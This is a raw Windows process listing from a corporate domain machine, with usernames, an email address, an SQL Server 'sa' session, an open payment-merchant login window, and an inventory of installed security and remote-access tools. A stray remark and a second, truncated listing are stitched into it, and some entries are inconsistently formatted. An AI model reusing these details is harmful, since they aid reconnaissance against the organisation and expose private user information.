wininit.exe 1236 Services 0 2,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 1244 Console 1 19,380 K Running NT AUTHORITY\SYSTEM 0:04:58 N/A
services.exe 1308 Services 0 13,988 K Unknown NT AUTHORITY\SYSTEM 0:03:53 N/A
LsaIso.exe 1320 Services 0 2,100 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
lsass.exe 1336 Services 0 26,320 K Unknown NT AUTHORITY\SYSTEM 0:20:34 N/A
svchost.exe 1460 Services 0 2,332 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1484 Services 0 37,304 K Unknown NT AUTHORITY\SYSTEM 0:03:38 N/A
WUDFHost.exe 1508 Services 0 2,336 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
fontdrvhost.exe 1536 Services 0 1,548 K Unknown Font Driver Host\UMFD-0 0:00:07 N/A
svchost.exe 1604 Services 0 21,892 K Unknown NT AUTHORITY\NETWORK SERVICE 0:07:21 N/A
svchost.exe 1652 Services 0 8,252 K Unknown NT AUTHORITY\SYSTEM 0:01:47 N/A
winlogon.exe 1748 Console 1 18,156 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A
fontdrvhost.exe 1812 Console 1 8,048 K Unknown Font Driver Host\UMFD-1 0:03:45 N/A
svchost.exe 1936 Services 0 18,244 K Unknown NT AUTHORITY\NETWORK SERVICE 0:04:46 N/A
svchost.exe 1952 Services 0 3,888 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 1964 Services 0 6,180 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
dwm.exe 1992 Console 1 116,224 K Running Window Manager\DWM-1 1:22:41 DWM Notification Window
svchost.exe 2000 Services 0 2,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1096 Services 0 4,480 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:37 N/A
svchost.exe 1596 Services 0 4,944 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1648 Services 0 6,040 K Unknown NT AUTHORITY/LOCAL SERVICE 0:00:00 N/A
svchost.exe 876 Services 0 7,480 K Unknown NT AUTHORITY/NETWORK SERVICE 0:14:02 N/A
svchost.exe 2124 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2300 Services 0 22,864 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A
svchost.exe 2352 Services 0 21,184 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:03 N/A
svchost.exe 2424 Services 0 8,128 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:57 N/A
NVDisplay.Container.exe 2452 Services 0 7,964 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2472 Services 0 7,292 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2600 Services 0 7,420 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:50 N/A
svchost.exe 2724 Services 0 5,660 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:08 N/A
svchost.exe 2792 Services 0 21,376 K Unknown NT AUTHORITY\SYSTEM 0:06:22 N/A
svchost.exe 2836 Services 0 7,808 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2844 Services 0 7,832 K Unknown NT AUTHORITY\SYSTEM 0:14:02 N/A
svchost.exe 2856 Services 0 2,872 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2864 Services 0 5,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 2872 Services 0 11,080 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A
Memory Compression 3064 Services 0 430,432 K Unknown NT AUTHORITY\SYSTEM 0:05:03 N/A
svchost.exe 2536 Services 0 6,624 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 3104 Services 0 5,832 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 3140 Services 0 6,612 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3148 Services 0 6,960 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:20 N/A
svchost.exe 3340 Services 0 5,788 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3608 Services 0 3,948 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A
spaceman.exe 3640 Services 0 716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3712 Services 0 7,372 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A
svchost.exe 3764 Services 0 4,756 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 3988 Services 0 11,608 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A
svchost.exe 4084 Services 0 19,856 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A
svchost.exe 3204 Services 0 4,208 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 3136 Services 0 3,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 8 Services 0 3,436 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4172 Services 0 6,224 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
spoolsv.exe 4268 Services 0 28,488 K Unknown NT AUTHORITY\SYSTEM 0:00:25 N/A
vmms.exe 4640 Services 0 14,652 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
BASupSrvcUpdater.exe 4648 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A
armsvc.exe 4656 Services 0 2,852 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
VmsWebGateway.exe 4664 Services 0 47,684 K Unknown NT AUTHORITY\SYSTEM 0:23:36 N/A
3CXWMRemoteControlSvc.exe 4672 Services 0 2,972 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4680 Services 0 7,236 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 4688 Services 0 2,956 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 4704 Services 0 33,592 K Unknown NT AUTHORITY\SYSTEM 0:01:15 N/A
BASupSrvc.exe 4720 Services 0 23,504 K Unknown NT AUTHORITY\SYSTEM 0:07:03 N/A
DymoPnpService.exe 4732 Services 0 4,460 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4740 Services 0 34,384 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:11 N/A
AdobeUpdateService.exe 4748 Services 0 3,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PcmService.exe 4756 Services 0 10,676 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4772 Services 0 3,248 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SDFSSvc.exe 4764 Services 0 9,532 K Unknown NT AUTHORITY\SYSTEM 0:01:11 N/A
svchost.exe 4780 Services 0 1,984 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
vmware-authd.exe 4796 Services 0 6,124 K Unknown NT AUTHORITY\SYSTEM 0:13:46 N/A
EPUpdateService.exe 4804 Services 0 9,680 K Unknown NT AUTHORITY\SYSTEM 0:01:10 N/A
sqlwriter.exe 4812 Services 0 3,068 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SDUpdSvc.exe 4820 Services 0 14,560 K Unknown NT AUTHORITY\SYSTEM 0:00:50 N/A
RtkAudUService64.exe 4828 Services 0 3,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
IpOverUsbSvc.exe 4836 Services 0 4,736 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4844 Services 0 36,140 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:28 N/A
svchost.exe 4860 Services 0 13,024 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
bdredline.exe 4868 Services 0 10,680 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 4876 Services 0 7,516 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:14 N/A
NCentralLauncherService.e 4896 Services 0 11,280 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 4904 Services 0 3,872 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
RedGate.Client.Service.ex 4912 Services 0 27,480 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
EPIntegrationService.exe 4920 Services 0 14,488 K Unknown NT AUTHORITY\SYSTEM 0:01:31 N/A
vmnetdhcp.exe 4936 Services 0 2,716 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
mDNSResponder.exe 4944 Services 0 4,056 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 4952 Services 0 2,768 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AGMService.exe 4960 Services 0 9,396 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
agent.exe 4972 Services 0 244,776 K Unknown NT AUTHORITY\SYSTEM 0:13:16 N/A
wgsslvpnsrc.exe 4980 Services 0 2,796 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
EPProtectedService.exe 5008 Services 0 6,552 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
vmware-usbarbitrator64.ex 5036 Services 0 3,968 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
EPSecurityService.exe 5048 Services 0 332,708 K Unknown NT AUTHORITY\SYSTEM 3:07:02 N/A
vmnat.exe 5124 Services 0 3,480 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AGSService.exe 5144 Services 0 8,696 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
CptService.exe 5156 Services 0 2,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
TeamViewer_Service.exe 5384 Services 0 5,952 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 5392 Services 0 3,520 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:03 N/A
svchost.exe 5508 Services 0 5,976 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 5540 Services 0 3,440 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
svchost.exe 5580 Services 0 5,104 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
SDWSCSvc.exe 5612 Services 0 5,748 K Unknown NT AUTHORITY\SYSTEM 0:01:39 N/A
svchost.exe 5808 Services 0 5,472 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
dasHost.exe 5932 Services 0 7,188 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 6804 Services 0 4,624 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:01 N/A
GWCtlSrv.exe 7056 Services 0 129,840 K Unknown NT AUTHORITY\SYSTEM 1:04:01 N/A
unsecapp.exe 7416 Services 0 4,216 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dasHost.exe 7920 Services 0 1,780 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A
svchost.exe 8480 Services 0 4,196 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
vmcompute.exe 8552 Services 0 2,560 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 9192 Services 0 4,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 8084 Services 0 3,156 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dllhost.exe 9356 Services 0 6,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
WmiPrvSE.exe 9456 Services 0 44,636 K Unknown NT AUTHORITY\SYSTEM 0:17:58 N/A
svchost.exe 11224 Services 0 4,700 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
NableSixtyFourBitManager.     9308 Services 0 35,324 K Unknown NT AUTHORITY\SYSTEM 0:18:15 N/A
conhost.exe 9280 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
NableReactiveManagement.e 8436 Services 0 15,752 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
conhost.exe 8432 Services 0 3,812 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 10260 Services 0 13,796 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 11552 Services 0 8,116 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
SolarWinds.MSP.CacheServi 10272 Services 0 24,052 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:11 N/A
SolarWinds.MSP.RpcServerS 12376 Services 0 17,752 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
NVDisplay.Container.exe 12824 Console 1 23,560 K Running NT AUTHORITY\SYSTEM 0:00:12 NvSvc
svchost.exe 13072 Services 0 5,272 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:47 N/A
svchost.exe 3972 Services 0 9,556 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
cmd.exe 10692 Services 0 3,472 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 3472 Services 0 4,636 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
powershell.exe 9392 Services 0 8,312 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
ALEService.exe 6424 Services 0 278,392 K Unknown WATERWAY\Administrator 25:54:25 N/A
SgrmBroker.exe 9920 Services 0 6,524 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
SolarWinds.MSP.PME.Agent.    10480 Services 0 6,140 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AgentMaint.exe 8472 Services 0 12,552 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
NableAVDBridge.exe 1080 Services 0 20,836 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
conhost.exe 3952 Services 0 8,588 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
svchost.exe 12600 Services 0 6,264 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 5348 Services 0 8,256 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A
svchost.exe 13084 Services 0 14,636 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
WmiPrvSE.exe 11176 Services 0 18,112 K Unknown NT AUTHORITY\SYSTEM 0:12:50 N/A
svchost.exe 12772 Services 0 12,884 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
EPConsole.exe 10036 Console 1 980 K Running WATERWAY\mharper 0:01:24 DeviceScanInvisibleDialog
sihost.exe 8052 Console 1 26,364 K Running WATERWAY\mharper 0:00:59 N/A
svchost.exe 13196 Console 1 34,052 K Unknown WATERWAY\mharper 0:02:50 N/A
svchost.exe 5636 Console 1 28,584 K Running WATERWAY\mharper 0:00:15 N/A Windows Push Notifications Platform
svchost.exe 3496 Services 0 20,100 K Unknown NT AUTHORITY\SYSTEM 0:02:27 N/A
svchost.exe 12876 Services 0 5,884 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
explorer.exe 7964 Console 1 161,740 K Running WATERWAY\mharper 0:09:58 N/A
svchost.exe 12656 Console 1 23,688 K Running WATERWAY\mharper 0:00:11 N/A
StartMenuExperienceHost.e 12852 Console 1 71,244 K Running WATERWAY\mharper 0:00:06 Start
RuntimeBroker.exe 11180 Console 1 10,820 K Unknown WATERWAY\mharper 0:00:01 N/A
PowerToys.exe 3224 Console 1 16,996 K Running WATERWAY\mharper 0:02:35 N/A
SearchUI.exe 1740 Console 1 191,720 K Running WATERWAY\mharper 0:01:01 N/A
RuntimeBroker.exe 9124 Console 1 33,680 K Running WATERWAY\mharper 0:00:18 N/A
SecurityHealthSystray.exe 13596 Console 1 8,472 K Running WATERWAY\mharper 0:00:07 N/A
SecurityHealthService.exe 13616 Services 0 12,748 K Unknown NT AUTHORITY\SYSTEM 0:01:14 N/A
svchost.exe 14072 Services 0 9,028 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SetPoint.exe 1872 Console 1 10,252 K Running WATERWAY\mharper 0:00:07 N/A
KHALMNPR.exe 13780 Console 1 9,236 K Running WATERWAY\mharper 0:00:16 KHALHIDC_MainWindow
RtkAudUService64.exe 14060 Console 1 6,916 K Running WATERWAY\mharper 0:00:00 RealtekAudioBackgroundProcessClass
svchost.exe 8320 Services 0 7,180 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
RuntimeBroker.exe 14364 Console 1 19,484 K Unknown WATERWAY\mharper 0:00:45 N/A
LogiOptions.exe 14388 Console 1 9,392 K Running WATERWAY\mharper 0:01:37 LOGI_RAWINPUT_WND
LogiOptionsMgr.exe 14516 Console 1 29,380 K Running WATERWAY\mharper 0:09:59 LDEVICEMGR_WINDOW_{49DCDDA1-BF03-46BC-B469-59A0616325A2}
LogiOverlay.exe 14528 Console 1 61,356 K Running WATERWAY\mharper 0:00:44 WISPTIS
StreamDeck.exe 14624 Console 1 47,372 K Running WATERWAY\mharper 2:09:20 NVOpenGLPbuffer
OneDrive.exe 14836 Console 1 38,668 K Running WATERWAY\mharper 0:00:27 DDE Server Window
flux.exe 15676 Console 1 19,472 K Running WATERWAY\mharper 0:00:39 f.lux: Softer during the day, Warm before bed
CCleaner64.exe 15592 Console 1 45,016 K Running WATERWAY\mharper 0:01:12 N/A
GlassWire.exe 15532 Console 1 65,324 K Running WATERWAY\mharper 0:02:22 GlassWire
svchost.exe 15548 Services 0 16,388 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
QtWebEngineProcess.exe 15568 Console 1 8,100 K Unknown WATERWAY\mharper 0:00:00 N/A
svchost.exe 16508 Services 0 6,152 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:00 N/A
com.barraider.spotify.exe 16832 Console 1 10,068 K Unknown WATERWAY\mharper 0:00:10 N/A
conhost.exe 18784 Console 1 4,088 K Unknown WATERWAY\mharper 0:00:00 N/A
com.barraider.streamcount 18836 Console 1 37,360 K Running WATERWAY\mharper 0:24:35 .NET-BroadcastEventWindow.4.0.0.0.37a9c05.0
QtWebEngineProcess.exe 18844 Console 1 12,188 K Unknown WATERWAY\mharper 0:00:00 N/A
conhost.exe 18856 Console 1 4,104 K Unknown WATERWAY\mharper 0:00:00 N/A
cpu.exe 18984 Console 1 4,780 K Unknown WATERWAY\mharper 0:00:25 N/A
conhost.exe 18992 Console 1 4,100 K Unknown WATERWAY\mharper 0:00:00 N/A
com.nicollasr.streamdeckv 19016 Console 1 14,940 K Running WATERWAY\mharper 0:00:07 OleMainThreadWndName
conhost.exe 19048 Console 1 3,984 K Unknown WATERWAY\mharper 0:00:00 N/A
twitchstudiostreamdeck.ex 19056 Console 1 3,624 K Unknown WATERWAY\mharper 0:00:00 N/A
conhost.exe 19072 Console 1 3,988 K Unknown WATERWAY\mharper 0:00:00 N/A
ColorPicker.exe 20096 Console 1 9,928 K Running WATERWAY\mharper 0:00:05 MediaContextNotificationWindow
PowerLauncher.exe 20412 Console 1 131,324 K Running WATERWAY\mharper 0:02:46 Hidden Window
CCXProcess.exe 19820 Console 1 2,372 K Unknown WATERWAY\mharper 0:00:00 N/A
node.exe 19840 Console 1 13,504 K Unknown WATERWAY\mharper 0:00:21 N/A
conhost.exe 19876 Console 1 4,084 K Unknown WATERWAY\mharper 0:00:00 N/A
Screenpresso.exe 19996 Console 1 25,832 K Running WATERWAY\mharper 0:00:11 N/A
AdobeIPCBroker.exe 20912 Console 1 6,108 K Running WATERWAY\mharper 0:00:02 N/A
NCentralRRDLdr.exe 14720 Console 1 7,892 K Running WATERWAY\mharper 0:00:06 N/A
3CXWin8Phone.exe 21632 Console 1 123,544 K Running WATERWAY\mharper 0:44:55 3CX - 3592 Mark Harper
BASupSrvcCnfg.exe 21872 Console 1 12,808 K Running WATERWAY\mharper 0:11:53 IncomingVoIPCallTrayForm
acrotray.exe 13696 Console 1 16,756 K Running WATERWAY\mharper 0:00:00 AcrobatTrayIcon
WScheduler.exe 23000 Console 1 5,364 K Running WATERWAY\mharper 0:01:44 WScheduler
SDTray.exe 23544 Console 1 17,668 K Running WATERWAY\mharper 0:01:15 Spybot - Search & Destroy 2
ShellExperienceHost.exe 17392 Console 1 56,400 K Running WATERWAY\mharper 0:00:12 New notification
RuntimeBroker.exe 20748 Console 1 19,832 K Running WATERWAY\mharper 0:00:00 N/A
GWIdlMon.exe 25244 Console 1 7,004 K Running WATERWAY\mharper 0:00:16 GlassWireIdleMonitorWn
conhost.exe 25252 Console 1 3,992 K Unknown WATERWAY\mharper 0:00:00 N/A
svchost.exe 25592 Console 1 13,172 K Unknown WATERWAY\mharper 0:00:00 N/A
WinStore.App.exe 7836 Console 1 688 K Running WATERWAY\mharper 0:00:01 N/A
ApplicationFrameHost.exe 25828 Console 1 23,108 K Running WATERWAY\mharper 0:00:02 Calculator
RuntimeBroker.exe 24008 Console 1 14,084 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName
AcrobatNotificationClient 25972 Console 1 6,372 K Running WATERWAY\mharper 0:00:00 N/A
AdobeNotificationClient.e 25996 Console 1 14,900 K Running WATERWAY\mharper 0:00:00 N/A
AcrobatNotificationClient 26052 Console 1 6,404 K Running WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 16240 Console 1 14,568 K Unknown WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 25876 Console 1 14,396 K Unknown WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 25888 Console 1 11,688 K Unknown WATERWAY\mharper 0:00:00 N/A
CompPkgSrv.exe 23576 Console 1 6,024 K Unknown WATERWAY\mharper 0:00:00 N/A
SystemSettings.exe 22688 Console 1 644 K Running WATERWAY\mharper 0:00:00:00 Settings
svchost.exe 21296 Services 0 5,900 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
taskhostw.exe 26116 Console 1 15,672 K Running WATERWAY\mharper 0:00:00 Task Host Window
WindowsInternal.composabl 27044 Console 1 41,168 K Running WATERWAY\mharper 0:00:14 Microsoft Text Input Application
rundll32.exe 26128 Console 1 5,896 K Running WATERWAY\mharper 0:00:00 OleMainThreadWndName
svchost.exe 25704 Services 0 4,896 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
notepad.exe 2892 Console 1 10,996 K Running WATERWAY\mharper 0:00:08 *Untitled - Notepad
SettingSyncHost.exe 15248 Console 1 5,636 K Running WATERWAY\mharper 0:00:00 N/A
svchost.exe 23560 Console 1 4,408 K Unknown WATERWAY\mharper 0:00:00 N/A
svchost.exe 6036 Services 0 5,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:30 N/A
NCentralRDViewer.exe 2440 Console 1 16,612 K Running WATERWAY\mharper 0:01:03 SolarWinds Take Control
svchost.exe 17712 Services 0 8,284 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
SystemSettingsBroker.exe 10444 Console 1 8,000 K Unknown WATERWAY\mharper 0:00:00 N/A
Microsoft.Photos.exe 29200 Console 1 68,756 K Running WATERWAY\mharper 0:00:41 OleMainThreadWndName
RuntimeBroker.exe 28796 Console 1 28,488 K Running WATERWAY\mharper 0:00:57 N/A
Calculator.exe 21148 Console 1 500 K Running WATERWAY\mharper 0:00:00 Calculator
Video.UI.exe 30660 Console 1 12,768 K Running WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 24116 Console 1 7,544 K Unknown WATERWAY\mharper 0:00:00 N/A
ctfmon.exe 26676 Console 1 17,252 K Running WATERWAY\mharper 0:00:11 N/A
MailStoreHome.exe 8108 Console 1 432,560 K Running WATERWAY\mharper 7:17:28 Progress View
Ssms.exe 19396 Console 1,297,696 K Running WATERWAY\mharper 0:58:09 SQLQuery2.sql - Unit 43.Gilbarco (sa (60))* - Microsoft SQL Server Manag
unsecapp.exe 31732 Console 1 13,220 K Running WATERWAY\mharper 0:01:05 OleMainThreadWndName
firefox.exe 5428 Console 1 429,628 K Running WATERWAY\mharper 0:03:14 Authorize.NET - Login - Merchant Interface - Mozilla Firefox
firefox.exe 25284 Console 1 83,832 K Running WATERWAY\mharper 0:00:03 N/A
firefox.exe 27856 Console 1 71,808 K Running WATERWAY\mharper 0:00:01 OleMainThreadWndName
firefox.exe 9332 Console 1 423,712 K Running WATERWAY\mharper 0:08:55 OleMainThreadWndName
nplastpass.exe 16856 Console 1 9,912 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName
conhost.exe 20348 Console 1 6,384 K Unknown WATERWAY\mharper 0:00:00 N/A
firefox.exe 23236 Console 1 130,108 K Running WATERWAY\mharper 0:00:05 OleMainThreadWndName
firefox.exe 24704 Console 1 144,296 K Running WATERWAY\mharper 0:00:13 OleMainThreadWndName
firefox.exe 6720 Console 1 40,112 K Not Responding WATERWAY\mharper 0:00:01 OleMainThreadWndName
firefox.exe 2592 Console 1 34,500 K Not Responding WATERWAY\mharper 0:00:00 OleMainThreadWndName
YourPhone.exe 19940 Console 1 28,036 K Running WATERWAY\mharper 0:00:00 N/A
RuntimeBroker.exe 21212 Console 1 11,620 K Unknown WATERWAY\mharper 0:00:00 N/A
taskhostw.exe 22120 Console 1 19,008 K Running WATERWAY\mharper 0:00:00 Task Host Window
mstsc.exe 28548 Console 1 15,928 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
OfficeClickToRun.exe 25400 Services 0 72,136 K Unknown NT AUTHORITY\SYSTEM 0:00:17 N/A
AppVShNotify.exe 18780 Services 0 8,668 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
AppVShNotify.exe 7548 Console 1 9,424 K Unknown WATERWAY\mharper 0:00:00 N/A
SearchIndexer.exe 16388 Services 0 171,936 K Unknown NT AUTHORITY\SYSTEM 0:01:30 N/A
UserInterface.exe 22152 Console 1 34,048 K Running WATERWAY\mharper 0:00:00 Email Change Request - v2.0.0.12
mstsc.exe 18104 Console 1 8,880 K Unknown WATERWAY\mharper 0:00:15 N/A
WmiPrvSE.exe 20708 Services 0 14,132 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 18532 Services 0 7,532 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 25384 Services 0 21,744 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
TabTip.exe 8460 Console 1 17,892 K Running WATERWAY\mharper 0:00:00 G
svchost.exe 22944 Services 0 9,132 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
OUTLOOK.EXE 31768 Console 1 286,900 K Running WATERWAY\mharper 0:00:49 Orders - mharper@waterway.com - Outlook
SearchProtocolHost.exe 26768 Console 1 8,984 K Running WATERWAY\mharper 0:00:50 HardwareMonitorWindow
powershell.exe 23332 Services 0 74,120 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 26448 Services 0 12,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
powershell.exe 30680 Services 0 58,904 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 25292 Services 0 11,508 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SearchFilterHost.exe 17528 Services 0 28,072 K Unknown NT AUTHORITY\SYSTEM 0:00:13 N/A
svchost.exe 27460 Services 0 13,416 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SDUpdate.exe 15416 Services 0 20,268 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 29440 Services 0 8,720 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 27000 Console 1 6,088 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 13852 Console 1 13,148 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
tasklist.exe 18052 Console 1 11,924 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A


``was just now''.
chrome.exe 53128 Console 4 89,820 K Unknown WATERWAY\blauer 0:00:07 N/A
chrome.exe 50200 Console 4 86,080 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 55936 Console 4 167,528 K Unknown WATERWAY\blauer 0:00:06 N/A
Chrome isn't on the process sheet, I'll close my browser for 24 hours.
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 4076:03:56 N/A
System 4 Services 0 2,260 K Unknown N/A 55:26:16 N/A
Secure System 88 Services 0 40,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
Registry 152 Services 0 88,892 K Unknown NT AUTHORITY\SYSTEM 0:00:32 N/A
smss.exe 712 Services 0 1,004 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 1104 Services 0 3,312 K Unknown NT AUTHORITY\SYSTEM 0:02:42 N/A
wininit.exe 1204 Services 0 3,740 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 1280 Services 0 14,816 K Unknown NT AUTHORITY\SYSTEM 2:25:58 N/A
LsaIso.exe 1300 Services 0 2,456 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
lsass.exe 1308 Services 0 28,232 K Unknown NT AUTHORITY\SYSTEM 1:13:13 N/A
svchost.exe 1424 Services 0 2,904 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
